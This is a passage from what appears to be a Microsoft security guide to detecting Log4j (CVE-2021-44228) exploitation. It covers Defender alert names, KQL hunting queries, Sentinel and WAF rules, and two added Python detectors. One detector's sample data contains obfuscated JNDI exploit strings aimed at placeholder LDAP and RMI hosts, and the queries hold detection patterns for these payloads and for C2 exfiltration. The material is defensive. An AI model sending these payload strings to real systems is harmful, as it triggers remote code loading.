* [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation
* [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner
* [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation
* [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download the Cobalt Strike Beacon payload
On Linux:
* [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection
* [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner
* [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner
* [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader
* [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor
* [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor
* [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation
* [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)
* [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)
* [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner
* [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS
* [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads
* [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation
* [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner
#### Microsoft Defender for Endpoint
Users of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.
* Block executable files from running unless they meet a prevalence, age, or trusted list criterion
Because this vulnerability can be exploited through many network-facing vectors, and because applying mitigations holistically across large environments takes time, we encourage defenders to look for signs of post-exploitation rather than relying fully on prevention. Observed post-exploitation activity such as coin mining, lateral movement, and Cobalt Strike is detected with behavior-based detections.
Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms:
* **Log4j exploitation detected** – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
* **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation
* **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity
The following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don’t necessarily indicate successful exploitation:
* **Possible target of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _received by_ this device
* **Possible target of Log4j vulnerability scanning** – detects a possible _attempt to scan_ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device
* **Possible source of Log4j exploitation** – detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication _initiated from_ this device
* **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation
* **Possible Log4j exploitation (CVE-2021-44228)** – inactive, initially covered several of the above, now replaced with more specific titles
The following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:
* Suspicious remote PowerShell execution
* Download of file associated with digital currency mining
* Process associated with digital currency mining
* Cobalt Strike command and control detected
* Suspicious network traffic connection to C2 Server
* Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
Some of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.

_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_
#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)
Microsoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:
* Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))

_Figure 15. Microsoft 365 Defender alert "Exploitation attempt against Log4j (CVE-2021-44228)"_
#### Microsoft Defender for Office 365
To add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the “jndi” string in email headers or the sender email address field), which are moved to the Junk folder.
We also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:
* Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt – Email Headers (CVE-2021-44228))

_Figure 16. Sample alert on malicious sender display name found in email correspondence_
This detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.

_Figure 17. Sample email with malicious sender display name_
In addition, this email event can be surfaced via advanced hunting:

_Figure 18. Sample email event surfaced via advanced hunting_
#### Microsoft 365 Defender advanced hunting queries
To locate possible exploitation activity, run the following queries:
**Possible malicious indicators in cloud application events**
This query is designed to flag exploitation attempts for cases where the attacker is sending the crafted exploitation string using vectors such as User-Agent, Application, or Account name. The hits returned from this query are most likely unsuccessful attempts; however, the results can be useful to identify attacker details such as IP address, payload string, download URL, etc.
```kusto
CloudAppEvents
| where Timestamp > datetime("2021-12-09")
| where UserAgent contains "jndi:"
    or AccountDisplayName contains "jndi:"
    or Application contains "jndi:"
    or AdditionalFields contains "jndi:"
| project ActionType, ActivityType, Application, AccountDisplayName, IPAddress, UserAgent, AdditionalFields
```
**Alerts related to Log4j vulnerability**
This query looks for alert activity pertaining to the Log4j vulnerability.
```kusto
AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation',
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
```
**Devices with Log4j vulnerability alerts and additional other alert-related context**
This query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device.
```kusto
// Get any devices with Log4j-related alert activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
'Possible source of Log4j exploitation',
'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
)
// Join in evidence information to get the affected device
| join AlertEvidence on AlertId
| where DeviceId != ""
| summarize by DeviceId, Title;
// Get additional alert activity for each of those devices
AlertEvidence
| where DeviceId in(DevicesLog4JAlerts)
// Add alert titles for context
| join kind=leftouter AlertInfo on AlertId
| summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)
```
**Suspected exploitation of Log4j vulnerability**
This query looks for exploitation of the vulnerability using known parameters in the malicious string. It surfaces exploitation but may surface legitimate behavior in some environments.
```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all('${jndi') and ProcessCommandLine has_any('ldap', 'ldaps', 'http', 'rmi', 'dns', 'iiop')
// Removing known false positives
| where not(ProcessCommandLine has_any('stackstorm', 'homebrew'))
```
**Regex to identify malicious exploit string**
This query looks for the malicious string needed to exploit this vulnerability.
```kusto
DeviceProcessEvents
| where ProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
    or InitiatingProcessCommandLine matches regex @'(?i)\$\{jndi:(ldap|http|https|ldaps|dns|rmi|iiop):\/\/(\$\{([a-z]){1,20}:([a-z]){1,20}\})?(([a-zA-Z0-9]|-){2,100})?(\.([a-zA-Z0-9]|-){2,100})?\.([a-zA-Z0-9]|-){2,100}\.([a-z0-9]){2,20}(\/).*}'
```
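The email-header detection described earlier (which covers known obfuscation variants) and the regex hunting query above both hinge on the same problem: the literal string `jndi:` is rarely present once an attacker nests Log4j lookups such as `${lower:j}` or `${::-j}` around it. The following Python is an added example, not Microsoft's detection code or any query from this post. It first collapses the lookup forms Log4j itself would resolve before the JNDI lookup runs (`${lower:…}`, `${upper:…}`, and the `${…:-default}` default-value form), then matches the same scheme list as the regex above. The sample User-Agent, sender display-name and command-line values are constructed, and the IP addresses come from documentation ranges.

```python
import re

# Lookups Log4j 2 resolves before the JNDI lookup runs, which attackers nest to
# hide the literal string "jndi". Each pattern matches only an innermost ${...}
# (no nested braces inside), and normalize() loops until nothing changes.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# ${prefix:key:-default} and ${::-default}: a lookup that fails yields its default.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# Same scheme list as the hunting regex; Log4j lookup prefixes are case-insensitive.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|https):", re.IGNORECASE)


def normalize(value, max_passes=20):
    """Collapse nested lookup obfuscation roughly the way Log4j would resolve it."""
    for _ in range(max_passes):
        new = _LOWER.sub(lambda m: m.group(1).lower(), value)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def find_jndi_schemes(value):
    """Return the JNDI URL schemes found in a field after de-obfuscation."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(value))]


# Constructed sample records, not real telemetry. IPs are from documentation ranges.
SAMPLES = [
    {"id": 1, "field": "user_agent", "value": "${jndi:ldap://203.0.113.10:1389/a}"},
    {"id": 2, "field": "user_agent",
     "value": "${${lower:j}${lower:n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.10:1099/Exploit}"},
    {"id": 3, "field": "display_name",
     "value": "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//198.51.100.7/x}"},
    {"id": 4, "field": "user_agent", "value": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101"},
    {"id": 5, "field": "command_line", "value": "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar"},
    {"id": 6, "field": "user_agent", "value": "${${upper:j}ndi:${upper:l}dap://203.0.113.10/b}"},
]


def scan_records(records):
    """Return (record id, field, scheme) for every field that carries a JNDI lookup."""
    hits = []
    for rec in records:
        for scheme in find_jndi_schemes(rec["value"]):
            hits.append((rec["id"], rec["field"], scheme))
    return hits


if __name__ == "__main__":
    for rec_id, field, scheme in scan_records(SAMPLES):
        print(f"record {rec_id}: JNDI lookup via {scheme} in {field}")
```

Records 1, 2, 3 and 6 are flagged; the benign User-Agent and the hardened Java command line are not. A pure regex that only looks for `${jndi:` would miss records 2, 3 and 6, which is why normalizing first matters. Other lookup forms (for example `${env:...}` or `${sys:...}` resolving to real values) are not emulated here, so treat a hit as high-confidence and a miss as inconclusive.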
**Suspicious process event creation from VMWare Horizon TomcatService**
This query identifies anomalous child processes of the _ws_TomcatService.exe_ process, associated with exploitation of the Log4j vulnerability in VMware Horizon installations. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```kusto
DeviceProcessEvents
| where InitiatingProcessFileName has "ws_TomcatService.exe"
| where FileName != "repadmin.exe"
```
**Suspicious JScript staging comment**
This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```kusto
DeviceProcessEvents
| where FileName has "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
```
**Suspicious PowerShell curl flags**
This query identifies uncommon abbreviated parameters passed to PowerShell’s `curl` alias for Invoke-WebRequest (present in Windows PowerShell), where `-met` is a truncated `-Method`, used to POST the results of an attacker-executed command back to command-and-control infrastructure. If the event is a true positive, the contents of the `-Body` argument are the Base64-encoded results of an attacker-issued command. These events warrant further investigation to determine if they are in fact related to a vulnerable Log4j application.
```kusto
DeviceProcessEvents
| where FileName has "powershell.exe"
| where ProcessCommandLine has_all("-met", "POST", "-Body")
```
### Microsoft Defender for Cloud
Microsoft Defender for Cloud’s threat detection capabilities have been expanded to surface exploitation of CVE-2021-44228 in several relevant security alerts:
On Windows:
* Detected obfuscated command line
* Suspicious use of PowerShell detected
On Linux:
* Suspicious file download
* Possible Cryptocoinminer download detected
* Process associated with digital currency mining detected
* Potential crypto coin miner started
* A history file has been cleared
* Suspicious Shell Script Detected
* Suspicious domain name reference
* Digital currency mining related behavior detected
* Behavior similar to common Linux bots detected
### Microsoft Defender for IoT
Microsoft Defender for IoT has released a dedicated threat intelligence update package for detecting Log4j 2 exploit attempts on the network (example below).

_Figure 19. Microsoft Defender for IoT alert_
The package is available for download from the [Microsoft Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Getting_Started>): click **Updates**, then **Download file** (MD5: 4fbc673742b9ca51a9721c682f404c41).

_Figure 20. Microsoft Defender for IoT sensor threat intelligence update_
Microsoft Defender for IoT now pushes new threat intelligence packages to cloud-connected sensors upon release; see the [release notes](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/release-notes>) for more information. Starting with sensor version 10.3, users can automatically receive up-to-date threat intelligence packages through Microsoft Defender for IoT.
Working with automatic updates reduces operational effort and ensures greater security. Enable automatic updating on the [Defender for IoT portal](<https://ms.portal.azure.com/#blade/Microsoft_Azure_IoT_Defender/IoTDefenderDashboard/Sites>) by onboarding your cloud-connected sensor with the toggle for Automatic Threat Intelligence Updates turned on. For more information about threat intelligence packages in Defender for IoT, please refer to the [documentation](<https://docs.microsoft.com/en-us/azure/defender-for-iot/organizations/how-to-work-with-threat-intelligence-packages>).
### Microsoft Sentinel
A new Microsoft Sentinel solution has been added to the Content Hub that provides a central place to install Microsoft Sentinel specific content to monitor, detect, and investigate signals related to exploitation of the CVE-2021-44228 vulnerability.

_Figure 21. Log4j Vulnerability Detection solution in Microsoft Sentinel_
To deploy this solution, in the Microsoft Sentinel portal, select **Content hub (Preview)** under **Content Management**, then search for **Log4j** in the search bar. Select the **Log4j vulnerability detection** solution, and click **Install**. Learn how to [centrally discover and deploy Microsoft Sentinel out-of-the-box content and solutions](<https://docs.microsoft.com/azure/sentinel/sentinel-solutions-deploy>).

_Figure 22. Microsoft Sentinel Analytics showing detected Log4j vulnerability_
Note: We recommend that you check the solution for updates periodically, as new collateral may be added to this solution given the rapidly evolving situation. This can be verified on the main Content hub page.
#### Microsoft Sentinel queries
Microsoft Sentinel customers can use the following detection queries to look for this activity:
* [Possible exploitation of Apache Log4j component detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Apache_log4j_Vulnerability.yaml>)
This hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache. Attackers may attempt to launch arbitrary code by passing specific commands to a server, which are then logged and executed by the Log4j component.
* [Cryptocurrency miners EXECVE](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/CryptoCurrencyMiners.yaml>)
This query hunts through EXECVE syslog data generated by AUOMS to find instances of cryptocurrency miners being downloaded. It returns a table of suspicious command lines.
* [Azure WAF Log4j CVE-2021-44228 hunting](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/AzureDiagnostics/WAF_log4j_vulnerability.yaml>)
This hunting query looks in Azure Web Application Firewall data to find possible exploitation attempts for CVE-2021-44228 involving Log4j vulnerability.
* [Log4j vulnerability exploit aka Log4Shell IP IOC](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/Log4J_IPIOC_Dec112021.yaml>)
This hunting query identifies a match across various data feeds for IP IOCs related to the Log4j exploit described in CVE-2021-44228.
* [Suspicious shell script detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Suspicious_ShellScript_Activity.yaml>)
This hunting query helps detect post-compromise suspicious shell scripts that attackers use for downloading and executing malicious files. This technique is often used by attackers and was recently used to exploit the vulnerability in Log4j component of Apache to evade detection and stay persistent or for more exploitation in the network.
* [Azure WAF matching for ](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)[ Log4j vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureDiagnostics/AzureWAFmatching_log4j_vuln.yaml>)
This query alerts on a positive pattern match by Azure WAF for CVE-2021-44228 Log4j exploitation attempt. If possible, it then decodes the malicious command for further analysis.
* [Suspicious Base64 download activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Base64_Download_Activity.yaml>)
This hunting query helps detect suspicious Base64-encoded, obfuscated scripts that attackers use to encode payloads for downloading and executing malicious files. This technique is often used by attackers and was recently used following exploitation of the Log4j vulnerability in order to evade detection and stay persistent in the network.
* [Linux security-related process termination activity detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Process_Termination_Activity.yaml>)
This query alerts on attempts to terminate processes related to security monitoring. Attackers often try to terminate such processes post-compromise, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability.
* [Suspicious manipulation of firewall detected via Syslog data](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Firewall_Disable_Activity.yaml>)
This query uses syslog data to alert on any suspicious manipulation of the firewall to evade defenses. Attackers often perform such operations, as seen recently in attacks exploiting the CVE-2021-44228 vulnerability, to enable C2 communications or exfiltration.
* [User agent search for Log4j exploitation attempt](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/UserAgentSearch_log4j.yaml>)
This query uses various log sources having user agent data to look for CVE-2021-44228 exploitation attempt based on user agent pattern.
* [Network connections to LDAP port for CVE-2021-44228 vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/NetworkConnectionldap_log4j.yaml>)
This hunting query looks for connection to LDAP port to find possible exploitation attempts for CVE-2021-44228.
* [Linux toolkit detected](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Linux_Toolkit_Detected.yaml>)
This query uses syslog data to alert on any attack toolkits associated with massive scanning or exploitation attempts against a known vulnerability.
* [Container miner activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Syslog/Container_Miner_Activity.yaml>)
This query uses syslog data to alert on possible artifacts associated with containers running images related to digital cryptocurrency mining.
* [Network connection to new external LDAP server](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/NetworkConnectionToNewExternalLDAPServer.yaml>)
This query looks for outbound network connections using the LDAP protocol to external IP addresses, where that IP address has not had an LDAP network connection to it in the 14 days preceding the query timeframe. This could indicate someone exploiting a vulnerability such as CVE-2021-44228 to trigger the connection to a malicious LDAP server.
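The "new external LDAP server" logic above is a baselining detection: a destination is interesting only if no LDAP connection went to it during the lookback period before the query window. The following Python is an added example, not the Sentinel query itself, that implements the same idea over constructed connection records so the effect of the 14-day baseline can be seen directly. It assumes RFC 1918 space is internal and everything else external; the TEST-NET documentation ranges stand in for external addresses. In a real deployment this runs over CommonSecurityLog or equivalent network telemetry, and ports other than 389/636 should be added if your environment uses them.

```python
import ipaddress
from datetime import datetime, timedelta

LDAP_PORTS = {389, 636}
BASELINE = timedelta(days=14)
# Address plan assumed for the example: RFC 1918 space is internal, everything else external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed connection records, not real telemetry: (timestamp, source, destination, dst port).
# Documentation ranges (TEST-NET) stand in for external addresses.
CONNECTIONS = [
    ("2021-11-20T09:00:00", "10.0.0.5", "10.0.0.10", 389),      # internal domain controller
    ("2021-11-25T10:00:00", "10.0.0.5", "203.0.113.50", 636),   # partner LDAPS, before the baseline
    ("2021-12-08T10:00:00", "10.0.0.5", "203.0.113.50", 636),   # same partner, inside the baseline
    ("2021-12-10T14:05:00", "10.0.0.7", "198.51.100.23", 389),  # never seen before: candidate JNDI callback
    ("2021-12-10T14:06:00", "10.0.0.7", "198.51.100.23", 389),  # repeat one minute later
    ("2021-12-11T03:00:00", "10.0.0.9", "203.0.113.50", 636),   # partner again, already known
    ("2021-12-12T08:00:00", "10.0.0.9", "192.0.2.77", 1389),    # non-standard port, out of scope here
]
WINDOW_START = datetime(2021, 12, 10)
WINDOW_END = datetime(2021, 12, 13)


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def new_external_ldap(connections, window_start, window_end, baseline=BASELINE):
    """Return external LDAP destinations first contacted within [window_start, window_end)
    that had no LDAP connection during the `baseline` period immediately before the window.
    Each destination is reported once, at its first connection in the window."""
    rows = [(datetime.fromisoformat(ts), src, ipaddress.ip_address(dst), port)
            for ts, src, dst, port in connections]
    ldap = [r for r in rows if r[3] in LDAP_PORTS and not is_internal(r[2])]
    # Destinations seen in the lookback period are considered known and are not alerted on.
    known = {dst for ts, _, dst, _ in ldap if window_start - baseline <= ts < window_start}
    hits, reported = [], set()
    for ts, src, dst, port in sorted(ldap, key=lambda r: r[0]):
        if not (window_start <= ts < window_end) or dst in known or dst in reported:
            continue
        reported.add(dst)
        hits.append((ts.isoformat(), src, str(dst), port))
    return hits


if __name__ == "__main__":
    for hit in new_external_ldap(CONNECTIONS, WINDOW_START, WINDOW_END):
        print("new external LDAP destination:", hit)
```

With the 14-day baseline, only 198.51.100.23 is reported (once, at 14:05), because the partner LDAPS server was contacted on December 8 and is therefore known. Setting the baseline to zero makes the partner server fire as well, which is the false-positive class the lookback exists to suppress.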
### Azure Firewall Premium
Customers using Azure Firewall Premium have enhanced protection from the Log4j RCE vulnerability CVE-2021-44228 and its exploits. Azure Firewall Premium IDPS (Intrusion Detection and Prevention System) inspects all east-west traffic and outbound traffic to the internet. The vulnerability rulesets are continuously updated and have included CVE-2021-44228 signatures for different scenarios, including the UDP, TCP, and HTTP/S protocols, since December 10, 2021. The screenshot below shows all the scenarios that are actively mitigated by Azure Firewall Premium.
**Recommendation:** Customers are recommended to configure [Azure Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>) with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against **CVE-2021-44228** exploit.

_Figure 23. Azure Firewall Premium portal_
Customers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/en-us/azure/firewall/premium-migrate>). Customers new to Azure Firewall premium can learn more about [Firewall Premium](<https://docs.microsoft.com/en-us/azure/firewall/premium-features>).
### Azure Web Application Firewall (WAF)
In response to this threat, Azure Web Application Firewall (WAF) has updated Default Rule Set (DRS) versions 1.0/1.1 available for Azure Front Door global deployments, and OWASP ModSecurity Core Rule Set (CRS) version 3.0/3.1 available for Azure Application Gateway V2 regional deployments.
To help detect and mitigate the Log4Shell vulnerability by inspecting requests’ headers, URI, and body, we have released the following:
* For Azure Front Door deployments, we have updated the rule **944240 “Remote Command Execution”** under Managed Rules
* For Azure Application Gateway V2 regional deployments, we have introduced a new rule **Known-CVEs/800100** in the rule group Known-CVEs under Managed Rules
These rules are already enabled by default in block mode for all existing WAF Default Rule Set (DRS) 1.0/1.1 and OWASP ModSecurity Core Rule Set (CRS) 3.0/3.1 configurations. Customers using WAF Managed Rules would have already received enhanced protection for Log4j 2 vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>) and [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)); no additional action is needed.
**Recommendation**: Customers are recommended to enable WAF policy with Default Rule Set 1.0/1.1 on their Front Door deployments, or with OWASP ModSecurity Core Rule Set (CRS) versions 3.0/3.1 on Application Gateway V2 to immediately enable protection from this threat, if not already enabled. For customers who have already enabled DRS 1.0/1.1 or CRS 3.0/3.1, no action is needed. We will continue to monitor threat patterns and modify the above rule in response to emerging attack patterns as required.

_Figure 24. Remote Code Execution rule for Default Rule Set (DRS) versions 1.0/1.1_

_Figure 25. Remote Code Execution rule for OWASP ModSecurity Core Rule Set (CRS) version 3.1_
Note: The above protection is also available on Default Rule Set (DRS) 2.0 preview version and OWASP ModSecurity Core Rule Set (CRS) 3.2 preview version, which are available on Azure Front Door Premium and Azure Application Gateway V2 respectively. Customers using Azure CDN Standard from Microsoft can also turn on the above protection by enabling DRS 1.0.
More information about Managed Rules and Default Rule Set (DRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). More information about Managed Rules and OWASP ModSecurity Core Rule Set (CRS) on Azure Web Application Firewall can be found [here](<https://docs.microsoft.com/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules>).
## Indicators of compromise (IOCs)
